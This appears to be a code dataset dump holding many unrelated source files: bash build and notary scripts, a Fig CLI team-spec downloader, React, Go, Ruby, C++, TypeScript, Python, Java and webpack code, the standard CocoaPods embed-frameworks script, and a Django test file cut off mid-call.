text stringlengths 1 1.05M |
|---|
#!/bin/bash
# Fetch pubkey
pubkey=$(./printkey.py pub)
# Start KMD
echo "[KMD] : Starting KMD"
komodod -notary -pubkey=$pubkey > /dev/null 2>&1 &
# Start assets
if [[ $(./assetchains) = "finished" ]]; then
echo "Started Assetchains"
else
echo "Starting Assetchains Failed: help human!"
exit
fi
# Validate Address on KMD + AC, will poll deamon until started then check if address is imported, if not import it.
echo "[KMD] : Checking your address and importing it if required."
echo "[KMD] : $(./validateaddress.sh KMD)"
./listassetchains.py | while read chain; do
# Move our auto generated coins file to the iguana coins dir
chmod +x "$chain"_7776
mv "$chain"_7776 iguana/coins
echo "[$chain] : $(./validateaddress.sh $chain)"
done
echo "Building Iguana"
./build_iguana
echo "Finished: Please check ALL your chains are synced before running start_iguana.sh"
|
<filename>src/components/input/Radio/index.js<gh_stars>1-10
import React from 'react'
import PropTypes from 'prop-types'
import classNames from 'utils/classnames'
import Accordion from 'components/accordion/BaseAccordion'
import InputError from 'components/input/InputError'
const Radio = props => {
const {
name,
value,
error,
showError,
checked,
onChange,
className,
modifier,
label,
id
} = props
const hasError = showError && error && !!error.length
const modifiedClassNames = classNames('radio', className, modifier)
return (
<div className={modifiedClassNames}>
<label htmlFor={id} className='radio__label'>
<input
className='radio__input'
type='radio'
id={id}
name={name}
value={value}
checked={checked}
onChange={(e) => { onChange(e) }}
/>
<span className='radio__button'></span>
<h5 className='radio__label__text'>{label}</h5>
</label>
<Accordion
className='input__accordion'
isOpen={hasError}>
<InputError
className='micro'
errors={error} />
</Accordion>
</div>
)
}
Radio.propTypes = {
name: PropTypes.string,
value: PropTypes.string,
checked: PropTypes.bool
}
Radio.defaultProps = {
checked: false
}
export default Radio
|
<reponame>kellymclaughlin/go-fastly
package fastly
import (
"bytes"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"reflect"
"strconv"
"time"
"github.com/google/jsonapi"
)
// Events represents an event_logs item response from the Fastly API.
type Event struct {
ID string `jsonapi:"primary,event"`
CustomerID string `jsonapi:"attr,customer_id"`
Description string `jsonapi:"attr,description"`
EventType string `jsonapi:"attr,event_type"`
IP string `jsonapi:"attr,ip"`
Metadata map[string]interface{} `jsonapi:"attr,metadata,omitempty"`
ServiceID string `jsonapi:"attr,service_id"`
UserID string `jsonapi:"attr,user_id"`
CreatedAt *time.Time `jsonapi:"attr,created_at,iso8601"`
Admin bool `jsonapi:"attr,admin"`
}
// GetAPIEventsFilter is used as input to the GetAPIEvents function.
type GetAPIEventsFilterInput struct {
// CustomerID to Limit the returned events to a specific customer.
CustomerID string
// ServiceID to Limit the returned events to a specific service.
ServiceID string
// EventType to Limit the returned events to a specific event type. See above for event codes.
EventType string
// UserID to Limit the returned events to a specific user.
UserID string
// Number is the Pagination page number.
PageNumber int
// Size is the Number of items to return on each paginated page.
MaxResults int
}
// eventLinksResponse is used to pull the "Links" pagination fields from
// a call to Fastly; these are excluded from the results of the jsonapi
// call to `UnmarshalManyPayload()`, so we have to fetch them separately.
// type EventLinksResponse struct {
// Links EventsPaginationInfo `json:"links"`
// }
// EventsPaginationInfo stores links to searches related to the current one, showing
// any information about additional results being stored on another page
type EventsPaginationInfo struct {
First string `json:"first,omitempty"`
Last string `json:"last,omitempty"`
Next string `json:"next,omitempty"`
}
// GetAPIEventsResponse is the data returned to the user from a GetAPIEvents call
type GetAPIEventsResponse struct {
Events []*Event
Links EventsPaginationInfo `json:"links"`
}
// GetAPIEvents lists all the events for a particular customer
func (c *Client) GetAPIEvents(i *GetAPIEventsFilterInput) (GetAPIEventsResponse, error) {
eventsResponse := GetAPIEventsResponse{
Events: []*Event{},
Links: EventsPaginationInfo{},
}
var path = "/events"
filters := &RequestOptions{Params: i.formatEventFilters()}
resp, err := c.Get(path, filters)
if err != nil {
return eventsResponse, err
}
err = c.interpretAPIEventsPage(&eventsResponse, i.PageNumber, resp)
// NOTE: It's possible for eventsResponse to be partially completed before an error
// was encountered, so the presence of a statusResponse doesn't preclude the presence of
// an error.
// }
return eventsResponse, err
}
// GetAPIEventInput is used as input to the GetAPIEvent function.
type GetAPIEventInput struct {
// EventID is the ID of the event and is required.
EventID string
}
// GetAPIEvent gets a specific event
func (c *Client) GetAPIEvent(i *GetAPIEventInput) (*Event, error) {
if i.EventID == "" {
return nil, ErrMissingEventID
}
path := fmt.Sprintf("/events/%s", i.EventID)
resp, err := c.Get(path, nil)
if err != nil {
return nil, err
}
var event Event
if err := jsonapi.UnmarshalPayload(resp.Body, &event); err != nil {
return nil, err
}
return &event, nil
}
// interpretAPIEventsPage accepts a Fastly response for a set of WAF rule statuses
// and unmarshals the results. If there are more pages of results, it fetches the next
// page, adds that response to the array of results, and repeats until all results have
// been fetched.
func (c *Client) interpretAPIEventsPage(answer *GetAPIEventsResponse, pageNum int, received *http.Response) error {
// before we pull the status info out of the response body, fetch
// pagination info from it:
pages, body, err := getEventsPages(received.Body)
if err != nil {
return err
}
answer.Links = pages
data, err := jsonapi.UnmarshalManyPayload(body, reflect.TypeOf(new(Event)))
if err != nil {
return err
}
for i := range data {
typed, ok := data[i].(*Event)
if !ok {
return fmt.Errorf("got back response of unexpected type")
}
answer.Events = append(answer.Events, typed)
}
if pageNum == 0 {
if pages.Next != "" {
// NOTE: pages.Next URL includes filters already
resp, err := c.SimpleGet(pages.Next)
if err != nil {
return err
}
c.interpretAPIEventsPage(answer, pageNum, resp)
}
return nil
}
return nil
}
// getEventsPages parses a response to get the pagination data without destroying
// the reader we receive as "resp.Body"; this essentially copies resp.Body
// and returns it so we can use it again.
func getEventsPages(body io.Reader) (EventsPaginationInfo, io.Reader, error) {
var buf bytes.Buffer
tee := io.TeeReader(body, &buf)
bodyBytes, err := ioutil.ReadAll(tee)
if err != nil {
return EventsPaginationInfo{}, nil, err
}
var pages *GetAPIEventsResponse
json.Unmarshal(bodyBytes, &pages)
return pages.Links, bytes.NewReader(buf.Bytes()), nil
}
// formatEventFilters converts user input into query parameters for filtering
// Fastly events.
func (i *GetAPIEventsFilterInput) formatEventFilters() map[string]string {
result := map[string]string{}
pairings := map[string]interface{}{
"filter[customer_id]": i.CustomerID,
"filter[service_id]": i.ServiceID,
"filter[event_type]": i.EventType,
"filter[user_id]": i.UserID,
"page[size]": i.MaxResults,
"page[number]": i.PageNumber, // starts at 1, not 0
}
// NOTE: This setup means we will not be able to send the zero value
// of any of these filters. It doesn't appear we would need to at present.
for key, value := range pairings {
switch t := reflect.TypeOf(value).String(); t {
case "string":
if value != "" {
result[key] = value.(string)
}
case "int":
if value != 0 {
result[key] = strconv.Itoa(value.(int))
}
}
}
return result
}
|
require 'spec_helper'
describe 'basic confirms', js: true, type: :feature do
before do
if ENV['USE_TURBOLINKS']
visit root_path
page.execute_script('Turbolinks.visit("/confirms_page");')
#find_link('Index').trigger('click')
else
visit root_path
click_link 'Index'
end
end
shared_examples 'Confirm shows correctly' do |is_cow_deleted, is_remote|
let(:got_cow) { 'You got a pretty cow' }
let(:deleted_cow) { 'You murdered a silly cow' }
let(:message) { is_cow_deleted ? deleted_cow : got_cow }
it 'doesnt follow the link when click' do
expect(page).to have_content('Are you sure?')
expect(page).not_to have_content(message)
end
it 'doesnt follow the link when click on cancel' do
sleep 1
expect(page).to_not have_content(message)
click_button('Cancel')
sleep 1
expect(page).to_not have_content(message)
end
it 'goes to the link after accept confirm' do
#click_on '.confirm'
expect(page).to_not have_content(message)
sleep 1
click_button('Ok')
expect(page).to have_content(message)
end unless is_remote
end
describe 'normal links' do
before do
#visit confirms_page_path
find_link("Basic confirm").trigger('click')
end
it_behaves_like 'Confirm shows correctly'
end
describe 'methods links' do
before do
find_link("Delete confirm").trigger('click')
sleep 2
end
it_behaves_like 'Confirm shows correctly', true
end
describe 'remote links' do
before do
find_link("Remote confirm").trigger('click')
sleep 3
end
it_behaves_like 'Confirm shows correctly', true, true
it 'ajax change content in the page after accept confirm' do
#click_on '.confirm'
sleep 3
expect(page).to_not have_content('You murdered a silly cow with ajax')
sleep 3
click_button('Ok')
expect(page).to have_content('You murdered a silly cow with ajax')
end
end
describe 'Custom confirm' do
before do
visit confirms_page_path
end
it 'when click on a link with a confirm and have custom options' do
find_link("Custom confirm").trigger('click')
sleep 1
expect(page).to have_css('.confirm', text: 'Im ready')
expect(page).to have_css('.cancel', text: 'No way')
expect(page).to have_css('.sa-info', visible: true)
expect(page).to have_css('h2', text: 'Are you ready?')
expect(page).to have_css('p', text: 'This is a subtitle')
end
end
describe 'Submit confirm' do
before do
#visit confirms_page_path
find("#submit-delete").trigger('click')
end
it_behaves_like 'Confirm shows correctly', true
end
describe 'button_tag links' do
before do
#visit confirms_page_path
find_button("Button_tag confirm").trigger('click')
end
it_behaves_like 'Confirm shows correctly', true
end
end
|
#!/usr/bin/env bash
dbio dss post-bundles-checkout --replica aws --uuid fff746b3-e3eb-496a-88a3-5fa1fa358392
|
#include "./Civilization.hpp"
#include "Bubble.hpp"
namespace Emperor2
{
Civilization *Bubble::BubbleSort(Civilization *civilizations, int numberOfCivilizations)
{
for (int i = 0; i < numberOfCivilizations - 1; i++)
{
for (int j = 0; j < numberOfCivilizations - i - 1; j++)
{
if (civilizations[j].population > civilizations[j + 1].population)
{
// Swap civilizations[j] and civilizations[j+1]
Civilization temp = civilizations[j];
civilizations[j] = civilizations[j + 1];
civilizations[j + 1] = temp;
}
}
}
return civilizations;
}
} // namespace Emperor2 |
<reponame>dogballs/battle-city<gh_stars>10-100
import { GameObject, Rect } from '../../core';
import { TerrainFactory, TerrainType } from '../../terrain';
import * as config from '../../config';
export class EditorBrush extends GameObject {
public type: TerrainType;
public zIndex = config.EDITOR_BRUSH_Z_INDEX;
constructor(width: number, height: number, type: TerrainType) {
super(width, height);
this.type = type;
}
protected setup(): void {
const tiles = TerrainFactory.createFromRegions(this.type, [
new Rect(0, 0, this.size.width, this.size.height),
]);
for (const tile of tiles) {
tile.setZIndex(this.zIndex + 1);
this.add(tile);
}
}
}
|
<filename>integer/circleOfNumbers_cf-134/solution.js
/*
Consider integer numbers from 0 to n - 1 written down along the circle in such a way that the distance between any two neighboring numbers is equal (note that 0 and n - 1 are neighboring, too).
Given n and firstNumber, find the number which is written in the radially opposite position to firstNumber.
Example
For n = 10 and firstNumber = 2, the output should be
circleOfNumbers(n, firstNumber) = 7.
Input/Output
[execution time limit] 4 seconds (js)
[input] integer n
A positive even integer.
Guaranteed constraints:
4 ≤ n ≤ 20.
[input] integer firstNumber
Guaranteed constraints:
0 ≤ firstNumber ≤ n - 1.
[output] integer
*/
function circleOfNumbers(n, firstNumber) {
const diff = firstNumber + n / 2;
return diff >= n ? diff - n : diff;
}
const q1 = [10, 2]; // 7
const q2 = [10, 7]; // 2
const q3 = [4, 1]; // 3
const q4 = [6, 3]; // 0
const q5 = [18, 6]; // 15
const q6 = [12, 10]; // 4
const q7 = [18, 5]; // 14
console.log(circleOfNumbers(...q1));
console.log(circleOfNumbers(...q2));
console.log(circleOfNumbers(...q3));
console.log(circleOfNumbers(...q4));
console.log(circleOfNumbers(...q5));
console.log(circleOfNumbers(...q6));
console.log(circleOfNumbers(...q7));
|
# (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from six import string_types
from six.moves.urllib.parse import urlparse
def config_proxy_skip(proxies, uri, skip_proxy=False):
"""
Returns an amended copy of the proxies dictionary - used by `requests`,
it will disable the proxy if the uri provided is to be reached directly.
Keyword Arguments:
proxies -- dict with existing proxies: 'https', 'http', 'no' as pontential keys
uri -- uri to determine if proxy is necessary or not.
skip_proxy -- if True, the proxy dictionary returned will disable all proxies
"""
parsed_uri = urlparse(uri)
# disable proxy if necessary
if skip_proxy:
proxies['http'] = ''
proxies['https'] = ''
elif proxies.get('no'):
urls = []
if isinstance(proxies['no'], string_types):
urls = proxies['no'].replace(';', ',').split(",")
elif isinstance(proxies['no'], list):
urls = proxies['no']
for url in urls:
if url in parsed_uri.netloc:
if 'http' in proxies:
proxies.pop('http')
if 'https' in proxies:
proxies.pop('https')
return proxies
|
<reponame>MieskeB/json-api-spring-boot
package nl.michelbijnen.jsonapi.test;
import nl.michelbijnen.jsonapi.parser.JsonApiConverter;
import nl.michelbijnen.jsonapi.test.mock.MockDataGenerator;
import nl.michelbijnen.jsonapi.test.mock.ObjectDto;
import org.json.JSONObject;
import org.junit.Before;
import org.junit.Test;
import java.util.ArrayList;
import java.util.List;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotNull;
public class ListTest {
private List<ObjectDto> objectDtos;
@Before
public void before() throws CloneNotSupportedException {
MockDataGenerator generator = MockDataGenerator.getInstance();
this.objectDtos = new ArrayList<>();
this.objectDtos.add((ObjectDto) generator.getObjectDto().clone());
this.objectDtos.add((ObjectDto) generator.getObjectDto().clone());
}
@Test
public void testIfLinksExists() {
JSONObject jsonObject = new JSONObject(JsonApiConverter.convert(objectDtos));
assertNotNull(jsonObject.getJSONObject("links"));
}
@Test
public void testIfDataExists() {
JSONObject jsonObject = new JSONObject(JsonApiConverter.convert(objectDtos));
assertNotNull(jsonObject.getJSONArray("data"));
}
@Test
public void testIfDataContainsId() {
JSONObject jsonObject = new JSONObject(JsonApiConverter.convert(objectDtos));
assertEquals(objectDtos.get(0).getId(), jsonObject.getJSONArray("data").getJSONObject(0).getString("id"));
assertEquals(objectDtos.get(1).getId(), jsonObject.getJSONArray("data").getJSONObject(1).getString("id"));
}
@Test
public void testIfDataContainsType() {
JSONObject jsonObject = new JSONObject(JsonApiConverter.convert(objectDtos));
assertEquals("Object", jsonObject.getJSONArray("data").getJSONObject(0).getString("type"));
assertEquals("Object", jsonObject.getJSONArray("data").getJSONObject(1).getString("type"));
}
}
|
#!/usr/bin/env bash
# This script lets users upload a specific cli spec to fig's cloud
MAGENTA=$(tput setaf 5)
RED=$(tput setaf 1)
BOLD=$(tput bold)
NORMAL=$(tput sgr0)
HIGHLIGHT=$(tput smso)
HIGHLIGHT_END=$(tput rmso)
TAB=' '
print_special() {
echo "${TAB}$@${NORMAL}"$'\n'
}
#####################################
# State
#####################################
# Make sure dev_mode != 1 when this is pushed live
dev_mode=0
if [[ "$dev_mode" == '1' ]]
then
echo
echo "currently in dev mode"
echo
filename_endpoint="http://localhost:3000/autocomplete/team-file-name"
download_endpoint="http://localhost:3000/autocomplete/download-team-file"
else
filename_endpoint="https://api.fig.io/autocomplete/team-file-name"
download_endpoint="https://api.fig.io/autocomplete/download-team-file"
fi
subcommand_name="team:download"
upload_subcommand_name="team:upload"
#####################################
# Functions
#####################################
prompt_to_logout() {
# cat <<EOF
echo
print_special "${BOLD}It looks like you are not properly logged into ${MAGENTA}Fig${NORMAL}"
echo
print_special "Please logout using ${BOLD}${MAGENTA}fig util:logout${NORMAL} then log back in and try again"
# print_special "Fig will log you out and prompt you to log in again"
# echo
# print_special "When you've logged back in, please re-run ${BOLD}fig $subcommand_name ${NORMAL}"
# echo
# echo
# # https://serverfault.com/questions/532559/bash-script-count-down-5-minutes-display-on-single-line
# # Countdown timer
# secs=$((8))
# print_special "Press ctrl + c to cancel"
# while [ $secs -gt 0 ]; do
# echo -ne "${TAB}Time remaining before logout: $secs\033[0K\r"
# sleep 1
# : $((secs--))
# done
# fig util:logout
exit 1
}
#####################################
# Check token exists locally and is valid
#####################################
local_access_token=$(defaults read com.mschrage.fig access_token 2> /dev/null)
if [ -z $local_access_token ]
then
prompt_to_logout
fi
#####################################
# Make post request to fig server
#####################################
file_name=$(curl -s -X POST \
-H "Authorization: Bearer $local_access_token" \
$filename_endpoint 2> /dev/null)
#####################################
# Support
#####################################
if [[ "$file_name" == ERROR* ]]
then
cat <<EOF
${BOLD}${RED}Error${NORMAL}
$file_name
There was an error downloading your team's private completion specs.
Please contact ${BOLD}hello@fig.io${NORMAL} for support
EOF
elif [ -z $file_name ]
then
cat <<EOF
There don't seem to be any private completion specs associated with your team's domain.
Are you sure you / your team have uploaded private completion specs?
--
To upload completion specs, use:
fig $upload_subcommand_name <file path to private completion spec>
${BOLD}Examples${NORMAL}
fig $upload_subcommand_name ~/.fig/team/acme.js
fig $upload_subcommand_name /path/to/acme.js
EOF
fi
# If we are here, we know we have a file that exists
# https://stackoverflow.com/questions/21950049/create-a-text-file-in-node-js-from-a-string-and-stream-it-in-response
# -o "$file_name"
result=$(curl -s -X POST \
-H "Authorization: Bearer $local_access_token" \
$download_endpoint \
2> /dev/null )
if [[ -z "$result" ]] || [[ "$result" == ERROR* ]]
then
cat <<EOF
${BOLD}${MAGENTA}Error${NORMAL}
$result
There was an error downloading and/or saving your team's private autocomplete spec ${BOLD}${MAGENTA}$file_name${NORMAL}
If this problem persists, please contact hello@fig.io for support.
EOF
else
touch ~/.fig/team/$file_name
echo "$result" > ~/.fig/team/$file_name
# symlink and force option
ln -fs ~/.fig/team/"$file_name" ~/.fig/autocomplete/"$file_name"
cat <<EOF
${BOLD}${MAGENTA}Success${NORMAL}
Your team's completion spec ${BOLD}${MAGENTA}$file_name${NORMAL} was successfully downloaded/updated.
EOF
fi
|
const path = require('path');
// const UglifyWebpackPlugin = require('uglifyjs-webpack-plugin');
const TerserPlugin = require('terser-webpack-plugin');
module.exports = {
entry: './browser/index.js',
output: {
path: path.resolve(__dirname, 'dist'),
filename: 'adarender.js',
libraryTarget: 'umd',
library: 'adarender',
},
module: {
rules: [
{
test: /\.js?$/,
include: path.resolve(__dirname, './browser'),
exclude: /(node_modules|bower_components)/,
use: {
loader: 'babel-loader',
options: {
presets: ['@babel/preset-env'],
},
},
},
{
test: /\.(png|jpe?g|gif|svg)(\?.*)?$/,
use: [
{
loader: 'url-loader',
options: {
limit: 10000,
},
},
],
},
{
test: /\.css$/,
use: ['style-loader', 'css-loader'],
},
{
test: /\.(woff2?|eot|ttf|otf)(\?.*)?$/,
use: [
{
loader: 'url-loader',
options: {
limit: 10000,
},
},
],
},
],
},
optimization: {
// minimizer: [
// new TerserPlugin({
// ecma: 6,
// compress: true,
// }),
// ],
},
externals: {
echarts: 'echarts',
},
};
|
import requests
url = 'https://www.example.com/'
response = requests.get(url)
if response.status_code == 200:
print('Success!')
else:
print('An error has occurred.') |
<filename>config.ru
require 'sinatra'
require './app.rb'
run App
|
#!/bin/sh
set -e
set -u
set -o pipefail
function on_error {
echo "$(realpath -mq "${0}"):$1: error: Unexpected failure"
}
trap 'on_error $LINENO' ERR
if [ -z ${FRAMEWORKS_FOLDER_PATH+x} ]; then
# If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy
# frameworks to, so exit 0 (signalling the script phase was successful).
exit 0
fi
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
BCSYMBOLMAP_DIR="BCSymbolMaps"
# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")
# Copies and strips a vendored framework
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
if [ -d "${source}/${BCSYMBOLMAP_DIR}" ]; then
# Locate and install any .bcsymbolmaps if present, and remove them from the .framework before the framework is copied
find "${source}/${BCSYMBOLMAP_DIR}" -name "*.bcsymbolmap"|while read f; do
echo "Installing $f"
install_bcsymbolmap "$f" "$destination"
rm "$f"
done
rmdir "${source}/${BCSYMBOLMAP_DIR}"
fi
# Use filter instead of exclude so missing patterns don't throw errors.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
elif [ -L "${binary}" ]; then
echo "Destination binary is symlinked..."
dirname="$(dirname "${binary}")"
binary="${dirname}/$(readlink "${binary}")"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u)
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Copies and strips a vendored dSYM
install_dsym() {
local source="$1"
warn_missing_arch=${2:-true}
if [ -r "$source" ]; then
# Copy the dSYM into the targets temp dir.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}"
local basename
basename="$(basename -s .dSYM "$source")"
binary_name="$(ls "$source/Contents/Resources/DWARF")"
binary="${DERIVED_FILES_DIR}/${basename}.dSYM/Contents/Resources/DWARF/${binary_name}"
# Strip invalid architectures from the dSYM.
if [[ "$(file "$binary")" == *"Mach-O "*"dSYM companion"* ]]; then
strip_invalid_archs "$binary" "$warn_missing_arch"
fi
if [[ $STRIP_BINARY_RETVAL == 0 ]]; then
# Move the stripped file into its final destination.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.framework.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --links --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.dSYM" "${DWARF_DSYM_FOLDER_PATH}"
else
# The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing.
touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.dSYM"
fi
fi
}
# Used as a return value for each invocation of `strip_invalid_archs` function.
STRIP_BINARY_RETVAL=0
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
warn_missing_arch=${2:-true}
# Get architectures for current target binary
binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)"
# Intersect them with the architectures we are building for
intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)"
# If there are no archs supported by this binary then warn the user
if [[ -z "$intersected_archs" ]]; then
if [[ "$warn_missing_arch" == "true" ]]; then
echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)."
fi
STRIP_BINARY_RETVAL=1
return
fi
stripped=""
for arch in $binary_archs; do
if ! [[ "${ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary"
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
STRIP_BINARY_RETVAL=0
}
# Copies the bcsymbolmap files of a vendored framework
install_bcsymbolmap() {
local bcsymbolmap_path="$1"
local destination="${BUILT_PRODUCTS_DIR}"
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${bcsymbolmap_path}" "${destination}""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${bcsymbolmap_path}" "${destination}"
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY:-}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identity
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'"
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
code_sign_cmd="$code_sign_cmd &"
fi
echo "$code_sign_cmd"
eval "$code_sign_cmd"
fi
}
if [[ "$CONFIGURATION" == "Debug" ]]; then
install_framework "${BUILT_PRODUCTS_DIR}/AFNetworking/AFNetworking.framework"
install_framework "${BUILT_PRODUCTS_DIR}/SVProgressHUD/SVProgressHUD.framework"
install_framework "${BUILT_PRODUCTS_DIR}/wendyLib/wendyLib.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
install_framework "${BUILT_PRODUCTS_DIR}/AFNetworking/AFNetworking.framework"
install_framework "${BUILT_PRODUCTS_DIR}/SVProgressHUD/SVProgressHUD.framework"
install_framework "${BUILT_PRODUCTS_DIR}/wendyLib/wendyLib.framework"
fi
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
wait
fi
|
from datetime import date
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from core.models import FileDownload
from core.tests.utils import make_test_users
from mtp_auth.tests.utils import AuthTestCaseMixin
BANK_STATEMENT_LABEL = 'BANK_STATEMENT'
class CreateFileDownloadTestCase(AuthTestCaseMixin, APITestCase):
fixtures = ['initial_types.json', 'test_prisons.json', 'initial_groups.json']
def setUp(self):
super().setUp()
test_users = make_test_users()
self.bank_admins = test_users['bank_admins']
def test_create_file_download_succeeds(self):
user = self.bank_admins[0]
new_file_download = {
'label': BANK_STATEMENT_LABEL,
'date': date.today()
}
response = self.client.post(
reverse('filedownload-list'), data=new_file_download, format='json',
HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
file_downloads = FileDownload.objects.all()
self.assertEqual(file_downloads.count(), 1)
self.assertEqual(file_downloads[0].label, BANK_STATEMENT_LABEL)
self.assertEqual(file_downloads[0].date, date.today())
def test_create_file_download_only_allows_one_per_label_per_date(self):
user = self.bank_admins[0]
download_date = date.today()
new_file_download = {
'label': BANK_STATEMENT_LABEL,
'date': download_date
}
response = self.client.post(
reverse('filedownload-list'), data=new_file_download, format='json',
HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
new_file_download = {
'label': BANK_STATEMENT_LABEL,
'date': download_date
}
response = self.client.post(
reverse('filedownload-list'), data=new_file_download, format='json',
HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
file_downloads = FileDownload.objects.all()
self.assertEqual(file_downloads.count(), 1)
self.assertEqual(file_downloads[0].label, BANK_STATEMENT_LABEL)
self.assertEqual(file_downloads[0].date, download_date)
class MissingFileDownloadTestCase(AuthTestCaseMixin, APITestCase):
fixtures = ['initial_types.json', 'test_prisons.json', 'initial_groups.json']
def setUp(self):
super().setUp()
test_users = make_test_users()
self.bank_admins = test_users['bank_admins']
def _create_existing_file_downloads(self):
FileDownload(label=BANK_STATEMENT_LABEL, date=date(2018, 2, 5)).save()
FileDownload(label=BANK_STATEMENT_LABEL, date=date(2018, 2, 6)).save()
FileDownload(label=BANK_STATEMENT_LABEL, date=date(2018, 2, 8)).save()
FileDownload(label=BANK_STATEMENT_LABEL, date=date(2018, 2, 10)).save()
def test_missing_file_downloads_returned(self):
user = self.bank_admins[0]
self._create_existing_file_downloads()
params = {
'label': BANK_STATEMENT_LABEL,
'date': ['2018-02-06', '2018-02-07', '2018-02-08', '2018-02-09']
}
response = self.client.get(
reverse('filedownload-missing'), params, format='json',
